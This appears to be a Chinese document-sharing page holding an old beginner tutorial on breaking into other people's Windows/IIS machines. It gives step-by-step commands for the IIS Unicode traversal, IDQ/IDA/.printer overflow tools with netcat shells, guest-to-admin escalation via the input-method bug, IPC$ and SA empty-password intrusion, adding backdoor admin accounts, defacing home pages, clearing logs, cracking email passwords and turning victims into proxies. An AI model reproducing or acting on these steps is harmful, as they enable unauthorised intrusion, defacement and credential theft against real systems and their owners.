下載本文檔
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、由于網(wǎng)上很多朋友問我怎么入侵別人的機器,所以整理了一些我認為容易學(xué)的漏洞入侵方法,希望能給初學(xué)者一些幫助,下面講的內(nèi)容很簡單,高手就不用浪費時間看了,:) (1) UNICODE漏洞入侵 “Uicode漏洞”是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。 第一步,運行RANGSCAN掃描器,會出現(xiàn)掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框里填入啟始域(打個比方,比如你要掃至55)那么你在第一個框里就填入,在to 后面的框里填入55 意思就是掃至
2、55這段范圍里有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內(nèi)容的如: /scripts/.%c0%af./winnt/system32/cmd.exe 這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。 我們把/scripts/.%c0%af./winnt/system32/cmd.exe填入框里,再按一下添加。再按“掃描”。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結(jié)果框里就會顯示掃到的漏洞主機 如11/scripts/.%c
3、0%af./winnt/system32/cmd.exe 意思是11主機有 %c0%af 漏洞, 目標(biāo)有了,我們馬上打開瀏覽器。在網(wǎng)址欄里輸入: 11/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c: 回車 意思是查看機器里C盤的根目錄。一般情況下,我們都可以在瀏覽器里看到類似如: Directory of c: 2002-03-13 03:47p 289 default.asp 2002-02-11 03:47p 289 default.htm 2002-03-09 04:35p Documen
4、ts and Settings 2002-02-11 03:47p 289 index.asp 2002-02-11 03:47p 289 index.htm 2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 2002-03-09 04:22p Program Files 2002-01-23 06:21p WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,568 bytes free - 的目錄列表。也會碰到看不到文件的空目錄。 好,我們成功看到了機器里的C盤了。 我們在瀏覽器里輸入: 192.1
5、68.0.111/scripts/.%c0%af./winnt/system32/cmd.exe?/c+set 回車 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:Documents and SettingsAll Users CommonProgramFiles=C:Program FilesCommon Files COMPUTERNAME=
6、ON ComSpec=C:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=11 HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
7、 HTTP_ACCEPT_ENCODING=gzip, deflate HTTPS=off INSTANCE_ID=1 LOCAL_ADDR=11 NUMBER_OF_PROCESSORS=1 Os2LibPath=C:WINNTsystem32os2dll; OS=Windows_NT Path=C:WINNTsystem32;C:WINNT;C:WINNTSystem32Wbem;C:MSSQL7BINN PATH_TRANSLATED=c:inetpubwwwroot PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.W
8、SF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Fa - 哈,我們看到了機器設(shè)置內(nèi)容了,我們找找,主要看PATH_TRANSLATED=c:inetpubwwwroot 意思是他的主頁存放在c:inetpubwwwroot的目錄里,知道就好辦了。 我們用命令: 11/scripts/.%c0%af./winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot回車 我們就可以看到c:inetpubwwwroot目錄里的文件了,一般都有default.asp, defau
9、lt.htm , index.htm, index.asp,等等。我們以目錄里有index.asp做例子。 我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設(shè)置只讀。 我們用命令: 11/scripts/.%c0%af./winnt/system32/attrib.exe?%20-r%20-h%20c:inetpubwwwrootindex.asp 回車 當(dāng)看到下面的英文 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP header
10、s. The headers it did return are: 恭喜你,你可以改他的網(wǎng)頁了。 - 但如果你看到下面的英文就不成功,只好換其他機器了。 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access denied - C:inetpubwwwrootindex.asp - 繼續(xù)?,F(xiàn)在用ECHO改網(wǎng)頁的內(nèi)容。 11/scripts/.%c0%a
11、f./winnt/system32/cmd".exe?/c+echo+網(wǎng)站有漏洞+> c:inetpubwwwrootindex.asp 回車 當(dāng)看到 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 的提示,你已經(jīng)改了他的網(wǎng)頁了,呵呵,你想改成什么字也行。只要把命令中的中文換成你自己的中文就行了。 英文WIN2000 /scripts/.%c0%af./winnt/s
12、ystem32/cmd.exe?/c+dir+c: 中文WIN2000 /scripts/.%c0%2f./winnt/system32/cmd.exe /scripts/.%c1%1c./winnt/system32/cmd.exe WIN NT4 /scripts/.%c1%9c./winnt/system32/cmd.exe 英文WIN2000 /scripts/.%c0%af./winnt/system32/cmd.exe 通用代碼:/scripts/.%255c./winnt/system32/cmd.exe?/c+dir+c: (2) Windows2000輸入法漏洞 先用端口掃描
13、器掃描開放3389的機器,然后用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現(xiàn)輸入法狀態(tài)條,在輸入法狀態(tài)條上按鼠標(biāo)右鍵。選擇“幫助” “輸入法指南” “選項”。(如果發(fā)現(xiàn)“幫助”呈灰色,放棄,因為對方很可能發(fā)現(xiàn)并已經(jīng)補上了這個漏洞。)按右鍵,選擇“跳轉(zhuǎn)到URL”,輸入:c:winntsystem32在該目錄下找到“net.exe”,為“net.exe”創(chuàng)建一個快捷方式,右鍵點擊該快捷方式,在“屬性” “目標(biāo)”c:winntsystem32net.exe 后面空一格,填入“user guest /active :yes”。 點擊“確定”(目的
14、是,利用“net.exe”激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態(tài),但guest用戶已被激活。)然后重復(fù)操作上面的,在 “屬性” “目標(biāo)” c:winntsystem32net.exe 后面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用“net.exe”將guest變成系統(tǒng)管理員。)再次登錄終端服務(wù)器,以“guest”身份進入,此時guest已是系統(tǒng)管理員,已具備一切可執(zhí)行權(quán)及一切操作權(quán)限?,F(xiàn)在,我們可以像操作本地主機一樣,控制對方系統(tǒng)。 (3) idq溢出漏洞 要用到3個程序,一個Snake IIS
15、IDQ 溢出程序GUI版本,一個掃描器,還有NC。 首先掃描一臺有IDQ漏洞的機器,然后設(shè)置Snake IIS IDQ 溢出程序,在被攻擊IP地址后面寫上對方的IP.端口號一般不需要改動,軟件的默認綁定CMD.EXE的端口是813.不改了.用默認的,左面選擇操作系統(tǒng)類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出OK出現(xiàn)發(fā)送Shellcode成功的提示了,然后我們用NC來連接。 進入MS-DOS。進入“nc”的目錄。然后:nc -v IP 813 c:>nc -vv IP 813 IP: inverse host lookup failed: h_e
16、rrno 11004: NO_DATA (UNKNOWN) IP 813 (?): connection refused sent 0, rcvd 0: NOTSOCK c:> 看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。 c:>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) IP 813 (?) open Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-200
17、0 Microsoft Corp. C:WINNTsystem32> 哈哈,終于上來啦,你現(xiàn)在可是system權(quán)限,下面該怎么做就看你的啦。 (4)IDA溢出漏洞 所用程序:idahack 進入MS-DOS方式(假設(shè)idq.exe在c:下) c:idahack.exe 運行參數(shù):c:idahack chinese win2k : 1 chinese win2ksp1: 2 chinese win2ksp2: 3 english win2k : 4 english win2ksp1: 5 english win2ksp2: 6 japanese win2k : 7 japanese win
18、2ksp1: 8 japanese win2ksp2: 9 korea win2k : 10 korea win2ksp1: 11 korea win2ksp2: 12 chinese nt sp5 : 13 chinese nt sp6 : 14 c:idahack J80 1 80 connecting. sending. Now you can telnet to 80 port Good luck 好,現(xiàn)在你可以telnet它的80端口了,我們用NC來連接。 C:nc 80 Microsoft Windows 2000 Version 5.00.
19、2195 (C)版權(quán)所有 1985-1998 Microsoft Corp C:WINNTsystem32> OK,現(xiàn)在我們現(xiàn)在上來了,也可IDQ一樣是SYSTEN權(quán)限,盡情的玩吧。 (5).printer漏洞 這個漏洞,我們用兩個程序來入侵。iis5hack和nc。 C:>iis5hack iis5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p usage: D:IIS5HACK.EXE 用法: D:IIS5HACK <
20、;溢出的主機> <主機的端口> <主機的類型> <溢出的端口> chinese edition: 0 chinese edition, sp1: 1 english edition: 2 english edition, sp1: 3 japanese edition: 4 japanese edition, sp1: 5 korea edition: 6 korea edition, sp1: 7 mexico edition: 8 mexico edition, sp1: 9 c:>iis5hack 9 80 1 119 i
21、is5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p Listn: 80 connecting. sending. Now you can telnet to 3739 port good luck :) 溢出成功! c:>nc 9 119 Microsoft Windows 2000 Version 5.00.2195 (C) 版權(quán)所有 1985-2000 Microsoft Corp
22、. C:WINNTsystem32> OK,我們又成功取得system權(quán)限!玩吧。 (6)139端口入侵 我們先確定一臺存在139端口漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個端口掃描工具。假設(shè)現(xiàn)在我們已經(jīng)得到一臺存在139端口漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現(xiàn)在我們要做的是與對方計算機進行共享資源的連接。 用到兩個NET命令,下面就是這兩個命令的使用方法 NET VIEW? 作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。? 命令格式:net view computername | /domain:domainname? 參
23、數(shù)介紹:? <1>鍵入不帶參數(shù)的net view顯示當(dāng)前域的計算機列表。? <2>computername 指定要查看其共享資源的計算機。? <3>/domain:domainname指定要查看其可用計算機的域? NET USE? 作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。? 命令格式:net use devicename | * computernamesharenamevolume? password | * /user:domainnameusername /delete |? /persistent:yes | no? 參
24、數(shù)介紹:? 鍵入不帶參數(shù)的net use列出網(wǎng)絡(luò)連接。? devicename指定要連接到的資源名稱或要斷開的設(shè)備名稱。? computernamesharename服務(wù)器及共享資源的名稱。? password訪問共享資源的密碼。? *提示鍵入密碼。 /user指定進行連接的另外一個用戶。? domainname指定另一個域。? username指定登錄的用戶名。? /home將用戶連接到其宿主目錄? /delete取消指定網(wǎng)絡(luò)連接。? /persistent控制永久網(wǎng)絡(luò)連接的使用。? C:net use IP C:net view IP 我們已經(jīng)看到對方共享了他的C,D,E三個盤 我們要做的
25、是使用NBTSTAT命令載入NBT快取. c:>nbtstat R 載入NBT快取 c:>nbtstat c 看有無載入NBT快取 現(xiàn)在我們已經(jīng)得到的139端口漏洞的主機IP地址和用戶名,現(xiàn)在就該是我們進入他計算的時候了,點擊開始-查找-計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這臺電腦了!雙擊就可以進入,其使用的方法和網(wǎng)上領(lǐng)居的一樣。 (7)IPC入侵 所有程序:流光 開始:在主界面選擇 探測探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲
26、得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在“輔助主機”那里的“IPC$主機”前面打勾,然后在菜單了選“探測”,掃描出結(jié)果以后,“IPC$主機”,選中后按“CTRL+F9”就開始探測IPC用戶列表。會出現(xiàn)“IPC自動探測” 的窗體,把那兩個選項都選了,然后點“選項” 為了加快弱口令掃描速度,這里的兩個選項我們可以全部取消記住。然后點“確定”出來后點“是”就開始探測了。一會兒,結(jié)果出來了。比如我們探測出了用戶名為“admin”的管理員,密碼為“admin”,現(xiàn)在我們用命令提示符,熟悉下命令吧,輸入: net usefile:/對方ip/ipc$ "密
27、碼"/user:"用戶名" | 建立遠程連接 copy icmd.exe file:/對方ip/admin$ |admin$是對方的winnt目錄 net time file:/對方IP/ |看看對方的本地時間 at file:/對方ip/ 啟動程序的時間啟動程序名 啟動程序的參數(shù) |用at命令來定時啟動程序 telnet 對方ip端口 我們也可以改網(wǎng)頁: net use ipipc$ "admin" /uesr:"admin" 回車。 出現(xiàn)“命令成功完成”。 然后輸入“dir ipc$*.*” 看到C:下所有內(nèi)容。現(xiàn)在我們
28、來改主頁。一般主頁放在c:inetpubwwwroot里面 輸入“dir ipc$inetpubwwwroot*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入"copy 主頁文件 ipc$inetpubwwwroot"覆蓋原文件這樣就行了,簡單吧? 日志清除,斷開連接 : 我們copy cl.exe ,clear.exe 上去,再執(zhí)行,就可以清除日志,比如clear all :清除所有的日志。然后在斷開連接:net use file:/ip/ipc$ /delete (8
29、)超管SA空密碼漏洞 使用的工具:流光IV 啟動流光,按Ctrl+R。出現(xiàn)掃描設(shè)置對話框,設(shè)置掃描IP段,并且選擇掃描的類型為SQL。點擊“確定”,進行掃描,假設(shè)我們?nèi)〉弥鳈C:,然后點擊“工具” SQL遠程命令(或者Ctrl+Q),填入主機IP()、用戶(sa)、密碼(空)點擊“連接”,出現(xiàn)遠程命令行的界面。 net user heiying heiying1 /add 填加一個heiying的帳號和密碼heiying1 net localgroup administrators heiying /add 將我們創(chuàng)建的heiying帳號填加到管理組。 下面我
30、們來做跳板: 打開cmd.exe,輸入net use ipc$ "heiying1" /user:"heiying"命令 顯示命令成功完成。 上傳srv.exe: copy srv.exe admin$system32 上傳ntlm.exe: copy ntlm.exe admin$system32 啟動服務(wù): 首先用net time 看看對方主機的時間,(假如回顯 的本地時間是上午12.00),然后我們用at 2 12.01 srv.exe命令
31、來啟動srv.exe。等一分鐘后就可以telnet了。 一分鐘后在本機命令提示符中輸入: telnet . 99 然后我們要啟動NTLM.exe: 在telnet狀態(tài)下直接輸入ntlm回車。 顯示:windows 2000 telnet dump,by assassin,all rights reserved.done! 然后從新啟動對方主機的telnet服務(wù):net stop telnet(先關(guān)閉telnet服務(wù))再輸入net start telnet(啟動telnet服務(wù))然后我們退出telnet,然后在命令行下輸入telnet ,依照提示,接著輸入用戶名:heiying
32、,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧? (上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單里的種植者上傳,60秒后自動運行,不用敲命令!呵呵方便吧?。?(9)如何用流光破解信箱密碼 這次的目標(biāo)是21CN,運行流光IV,選擇POP3主機-右鍵-編輯-添加,填上:,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-從列表中添加-選擇一個字典,沒有的到網(wǎng)上下載一個字典,或者到黑白網(wǎng)絡(luò)去下載,我們用簡單模式探測!這樣速度比較快,然后就等著成果吧,上次我以下就破了5個郵箱出來。 (10)frontpage進行攻擊 打開您自己的Frontp
33、age,文件菜單下選擇“打開站點”,然后在文件夾框里寫入(http:/不要漏掉)。按下“打開”按鈕,一會后,出現(xiàn)了文件夾,成功了,現(xiàn)在就可以操作網(wǎng)頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來后就還可以改網(wǎng)頁。這個只能改該網(wǎng)頁,沒什么玩的。 (11)用肉雞做代理跳板 需要軟件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。 首先我們在命令提示符下建立IPC$管道: net u
34、se ipc$ "密碼" /user:帳號 通道建立好后,我們把srv.exe sss.exe ntlm.exe全部上傳。 c:copy srv.exe 0admin$ 1 files copied! c:copy ntlm.exe 0admin$ 1 files copied! c:copy sss.exe 0admin$ 1 files copied! 復(fù)制完畢后, 看肉雞上現(xiàn)在的時間: c:net time 顯示當(dāng)前時間是 2002/4/13 晚上 09:00 我們來啟動
35、srv.exe c:at 09:01 srv.exe 等到09:01后。我們來連接肉雞: c:telnet 99 連上后顯示: c:winntsystem32> 接著我們啟動NTLM.exe c:winntsystem32>ntlm 顯示: Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:WINNTsystem32> 首先我們終止srv.exe的telnet服務(wù): C:WINNTsystem32>net stop telnet 繼續(xù): C:WINNTsystem32>net start telnet 再啟動TELNET。 OK,我們來登陸 c:>telnet *= Microsoft Telnet *= c:> 好了,一切順利,我們現(xiàn)在正式開始做代
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年心理咨詢師題庫含完整答案【歷年真題】
- 二零二五民政局發(fā)布的離婚協(xié)議書示范文本與案例4篇
- 2025年度個人房地產(chǎn)居間服務(wù)協(xié)議合同范本4篇
- 二零二五年度美縫施工環(huán)保責(zé)任合同4篇
- 2025年度個人房產(chǎn)買賣合同物業(yè)交接范本2篇
- 學(xué)校獎項介紹
- 2025年高新技術(shù)企業(yè)研發(fā)成本控制合同范本4篇
- 2024年09月江蘇2024年興業(yè)銀行南京分行校園招考(鹽城)筆試歷年參考題庫附帶答案詳解
- 2025年度船舶建造與船舶保險代理服務(wù)合同3篇
- 二零二五版餐廳與旅行社旅游體驗合作合同3篇
- 不同茶葉的沖泡方法
- 光伏發(fā)電并網(wǎng)申辦具體流程
- 基本藥物制度政策培訓(xùn)課件
- 2025年中國華能集團限公司校園招聘高頻重點提升(共500題)附帶答案詳解
- 建筑勞務(wù)專業(yè)分包合同范本(2025年)
- GB/T 45002-2024水泥膠砂保水率測定方法
- 廣東省廣州海珠區(qū)2023-2024學(xué)年八年級上學(xué)期期末數(shù)學(xué)試卷(含答案)
- 飛行原理(第二版) 課件 第10章 高速空氣動力學(xué)基礎(chǔ)
- 廣西《乳腺X射線數(shù)字化體層攝影診療技術(shù)操作規(guī)范》
- 山西省2024年中考道德與法治真題試卷(含答案)
- 五年(2020-2024)高考地理真題分類匯編(全國版)專題12區(qū)域發(fā)展解析版
評論
0/150
提交評論